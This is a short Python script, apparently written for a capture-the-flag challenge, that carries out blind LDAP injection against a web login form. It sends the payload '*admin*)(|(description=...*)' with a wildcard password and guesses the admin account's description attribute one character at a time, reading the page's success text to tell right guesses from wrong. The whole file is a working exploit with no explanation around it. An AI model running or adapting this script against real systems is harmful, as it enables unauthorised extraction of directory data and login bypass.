Bilnd LDAP Data Exfiltration

import requests
url = 'TARGET'
onward = 'successful'
sucks = 'Login failed!'
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&_-+=,./?{}[]|<>:;"
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}
def builder(prefix):
    username_payload = f"*admin*)(|(description={prefix}*)"
    password_payload = "*"
    data = {
        "username": username_payload,
        "password": password_payload
    }
    r = requests.post(url, data = data, proxies = proxies, verify=False)
    return onward in r.text

def brutforce():
    found = ""

    while True:
        found_char = False
        for n in CHARSET:
            test_prefix = found + n
            if builder(test_prefix):
                found += n
                print(f"[+] Found character: '{n}' → Current description: {found}")
                found_char = True
                break
        if not found_char:
            print("done")
            break

    return found

if __name__ == "__main__":
    print("[*] Brute-forcing description attribute of admin…")
    description = brutforce()
    print(f"[!] Flag = '{description}'")